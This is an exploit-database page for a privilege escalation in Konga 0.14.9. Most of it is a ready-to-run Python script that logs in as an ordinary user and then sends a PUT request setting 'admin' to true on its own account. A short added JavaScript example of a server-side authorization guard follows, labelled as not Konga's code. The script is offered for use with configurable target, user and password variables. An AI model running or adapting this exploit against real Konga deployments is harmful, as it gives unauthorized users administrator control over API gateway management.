KONGA 0.14.9 Privilege Escalation

2021.11.16
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Title: KONGA 0.14.9 - Privilege Escalation
# Date: 10/11/2021
# Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)
# Vendor Homepage: https://github.com/pantsel/konga
# Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip
# Version: 0.14.9
# Tested on: Linux - Ubuntu 20.04.3 LTS (focal)

import requests
import json

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga" # change user
password = "changeme" # change password

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Content-Type": "application/json;charset=utf-8",
    "connection-id": "",
    "Origin": urlkonga,
    "Referer": urlkonga
}

url = urlkonga+"login"

data = {
    "identifier":identifier,
    "password":password
}

response = requests.post(url, json=data)
json_object = json.loads(response.text)

print("[+] Attack")
print("[+] Token " + json_object["token"])

url2 = urlkonga+"api/user/"+str(json_object["user"]["id"])
id = json_object["user"]["id"]

print("[+] Exploiting User ID "+str(json_object["user"]["id"]))

data2 = {
    "admin": "true",
    "passports": {
        "password": password,
        "protocol": "local"
    },
    "password_confirmation": password,
    "token":json_object["token"]
}

print("[+] Change Normal User to Admin")
response2 = requests.put(url2, headers=headers, json=data2)
print("[+] Success")
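The script above logs in as a normal user and then sends "admin": "true" in a PUT to api/user/<id> for its own account. A server-side guard against that request shape follows as an added example; it is not code from Konga or from the exploit authors, and the function name, the requester object and the privileged-field list are assumptions.

```javascript
// Added example: hypothetical update guard, not Konga's own code.
// Fields a non-admin must never set on a user record. Assumed list; "admin" is
// the field the script above sends.
const PRIVILEGED_FIELDS = ["admin"];

// requester: { id, admin } taken from the verified session or token, never the body.
// targetId:  the id from the URL path (api/user/<id>).
// body:      the parsed JSON body of the PUT request.
function authorizeUserUpdate(requester, targetId, body) {
  if (!requester || typeof body !== "object" || body === null || Array.isArray(body)) {
    return { status: 400, reason: "malformed request" };
  }
  // Strict comparison: a string such as "true" does not count as admin.
  const isAdmin = requester.admin === true;

  // Non-admins may only edit their own record.
  if (!isAdmin && String(targetId) !== String(requester.id)) {
    return { status: 403, reason: "cannot modify another user" };
  }

  const touched = PRIVILEGED_FIELDS.filter((f) =>
    Object.prototype.hasOwnProperty.call(body, f));

  // Fail closed: reject instead of silently stripping, so the attempt can be logged.
  if (!isAdmin && touched.length > 0) {
    return { status: 403, reason: "privileged field: " + touched.join(",") };
  }

  // Even for admins, accept only real booleans to avoid type-coercion surprises.
  for (const f of touched) {
    if (typeof body[f] !== "boolean") {
      return { status: 400, reason: f + " must be boolean" };
    }
  }
  return { status: 200, update: { ...body } };
}

// Constructed request mirroring the shape of the script's PUT body.
const sampleBody = { admin: "true", password_confirmation: "constructed-value" };
console.log(authorizeUserUpdate({ id: 7, admin: false }, "7", sampleBody));
```

The guard has to run on every code path that writes a user record, and the requester's role must come from server-side state rather than from anything in the request.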



Copyright 2021, cxsecurity.com

 
